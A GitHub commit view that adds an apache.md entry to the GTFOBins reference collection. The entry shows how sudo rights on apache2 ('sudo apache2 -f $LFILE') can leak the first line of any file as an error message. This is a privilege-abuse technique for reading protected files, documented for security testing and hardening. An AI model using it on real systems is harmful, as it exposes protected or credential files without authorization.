Create apache.md

This commit is contained in:
d3fudd 2024-01-23 20:30:15 -03:00 committed by GitHub
parent 4eca50ea16
commit 3dc961c0c9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

8
_gtfobins/apache.md Normal file
View File

@ -0,0 +1,8 @@
---
description: This includes the file in the actual configuration file, the first line is leaked as an error message.
functions:
sudo:
- code: |
LFILE=file_to_read
sudo apache2 -f $LFILE
---